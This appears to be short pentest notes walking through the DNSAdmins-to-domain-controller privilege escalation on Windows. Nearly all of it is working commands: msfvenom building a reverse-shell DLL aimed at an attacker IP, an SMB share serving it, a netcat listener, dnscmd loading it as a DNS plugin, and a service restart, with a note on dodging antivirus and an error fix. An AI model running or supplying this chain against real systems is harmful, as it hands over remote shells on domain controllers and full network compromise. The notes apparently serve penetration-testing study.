DNSAdmin Escalation

https://www.abhizer.com/windows-privilege-escalation-dnsadmin-to-domaincontroller/

Here, what we're doing is:

1. Making a dll payload that sends a reverse shell back to our machine with msfvenom.

2. Serving it using SMB Server to make it available to the Windows machine. (You can use any other way to transfer it to the remote machine, but be careful, it might get nuked by the Anti-Virus.) And, we will also setup a netcat listener to catch our reverse shell.

3. Importing that dll in the DNS Server.

4. Restarting the DNS Server so that it loads the dll file.

Checking if your user is a part of the DNSAdmins group:

whoami /all

Now, on to the fun part:

#making the payload

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.211.55.13 LPORT=4444 --platform=windows -f dll > ~/windows/privesc/plugin.dll

Here, because the Windows machine is of 64 bit achitechture, we're using x64 payload.

#serving the file using SMB Server using smbserver.py, that comes with Python3-Impacket.

cd /usr/share/doc/python3-impacket/examples
./smbserver.py SHARE ~/windows/privesc/

In another terminal tab, set up a netcat listener to catch the reverse shell:

nc -nvlp 4444

Now, in the compromised Windows machine:

#Importing the plugin:

dnscmd.exe myserver.local /config /serverlevelplugindll \\10.211.55.13\share\plugin.dll

#Restarting the service:

sc.exe stop dns
sc.exe start dns

Now, go back and check the netcat listener, you should have a reverse shell.

Comment: Change domain.local to IP - when RPC Error 1772. Found that fqdn didnt work, the ip of the dns server worked a treat.

dnscmd.exe 10.0.0.1 /config /serverlevelplugindll \\10.211.55.13\share\plugin.dll

Observation: access denied to restarting dns service prior to successfully running the above command.